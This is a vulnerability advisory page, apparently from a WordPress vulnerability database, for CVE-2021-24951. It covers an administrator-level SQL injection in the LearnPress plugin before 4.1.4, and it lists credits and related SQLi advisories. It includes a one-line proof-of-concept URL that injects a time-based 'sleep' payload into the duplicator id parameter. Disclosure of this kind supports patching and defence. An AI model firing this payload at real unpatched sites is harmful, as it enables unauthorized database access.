LearnPress < 4.1.4 – Admin+ SQL Injection | CVE 2021-24951 | Plugin Vulnerabilities

Description

The plugin does not sanitise, validate and escape the id parameter before using it in SQL statements when duplicating course/lesson/quiz/question, leading to SQL Injections issues

Proof of Concept

(Id needs to start with a valid course/lesson/quiz/question ID): https://examle.com/wp-admin/edit.php?post_type=lp_course&lp-ajax=duplicator&id=149%20and%20sleep(1)%23

Affects Plugins

Fixed in 4.1.4

References

CVE

Classification

Type

SQLI

OWASP top 10

CWE

CVSS

Miscellaneous

Original Researcher

ZhongFu Su(JrXnm) of Wuhan University

Submitter

ZhongFu Su(JrXnm) of Wuhan University

Submitter website

https://blog.szfszf.top

Submitter twitter

Verified

Yes

WPVDB ID

0a16ddc5-5ab9-4a8f-86b5-41edcbeafc50

Timeline

Publicly Published

2021-11-09 (about 2 years ago)

Added

2021-11-09 (about 2 years ago)

Last Updated

2022-09-26 (about 1 years ago)

Other

Published

Title

Published

2023-12-27

Title

Fluent Support < 1.7.7 - Authenticated(Administrator+) SQL Injection

Published

2021-12-15

Title

Post Grid < 2.1.13 - Contributor+ SQL Injection

Published

2024-04-03

Title

REHub Framework < 19.6.2 - Authenticated (Subscriber+) SQL Injection

Published

2022-05-09

Title

Note Press <= 0.1.10 - Admin+ SQLi via Bulk Actions

Published

2024-03-26

Title

RegistrationMagic – Custom Registration Forms, User Registration, Payment, and User Login < 5.3.2.0 - Authenticated (Contributor+) SQL Injection via Shortcode